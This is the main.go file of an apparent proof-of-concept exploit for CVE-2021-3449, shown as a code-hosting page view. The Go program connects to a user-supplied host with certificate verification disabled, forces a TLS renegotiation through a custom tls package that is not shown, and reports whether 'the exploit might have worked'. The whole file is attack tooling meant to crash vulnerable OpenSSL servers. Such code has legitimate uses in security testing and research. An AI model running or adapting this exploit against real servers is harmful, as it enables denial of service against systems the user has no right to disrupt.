/
main.go
34 lines (31 loc) · 906 Bytes
/
main.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
package main
import (
"flag"
"os"
"cve_2021_3449/tls"
)
func main() {
host := flag.String("host", "", "host:port to connect to")
servername := flag.String("sni", "", "servername")
flag.Parse()
// Connect to the target, forcing TLSv1.2
conn, err := tls.Dial("tcp", *host, &tls.Config{
InsecureSkipVerify: true,
Renegotiation: tls.RenegotiateFreelyAsClient,
ServerName: *servername,
})
if err != nil {
println("failed to connect: " + err.Error())
os.Exit(1)
}
defer conn.Close()
println("connected")
// Force a TLS renegotiation per RFC 5746.
if err := conn.Handshake(); err != nil && err.Error() == "tls: handshake failure" {
println("server is not vulnerable, exploit failed")
} else if err != nil {
println("malicious handshake failed, exploit might have worked: " + err.Error())
} else {
println("malicious renegotiation successful, exploit failed")
}
}